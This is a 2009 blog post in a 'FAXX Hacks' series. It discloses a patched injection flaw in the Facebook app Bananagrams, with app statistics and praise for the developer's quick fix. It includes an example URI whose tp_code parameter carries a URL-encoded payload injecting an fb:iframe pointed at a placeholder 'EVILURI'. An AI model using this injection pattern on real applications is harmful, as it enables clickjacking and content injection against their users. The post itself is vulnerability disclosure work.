Sep. 13, 2009

Posted by in FAXX Hacks | No comments

FAXX Hack: Bananagrams

Sorry for not posting yesterday – I’ll post another FAXX Hack in a bit to make up for it.

Facebook Verified Application

Current Monthly Active Users: 22,215

Current Rank on Application Leaderboard: 1,165

Application Developer: Large Animal Games

Responsiveness: LAG did not send any messages, but did patch the hole within a day or two. Actually, LAG was very responsive and moved swiftly to fix the holes, replying within minutes and posting a fix within hours. But for some reason, Gmail flagged the messages as spam and thus I didn’t notice them. My apologies to LAG, they did great work and I appreciate it!

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: http://apps.facebook.com/bananagrams/invite.php?tp_code=%22%2F%3E%3Cfb%3Aiframe+src%3D%22EVILURI%22%3E

Trackbacks/Pingbacks

  1. Tweets that mention FAXX Hack: Bananagrams | Social Hacking -- Topsy.com - [...] This post was mentioned on Twitter by theharmonyguy andSocialMediaSecurity. SocialMediaSecurity said: FAXX Hack: Bananagrams http://bit.ly/1XUXxE [...]

Leave a Reply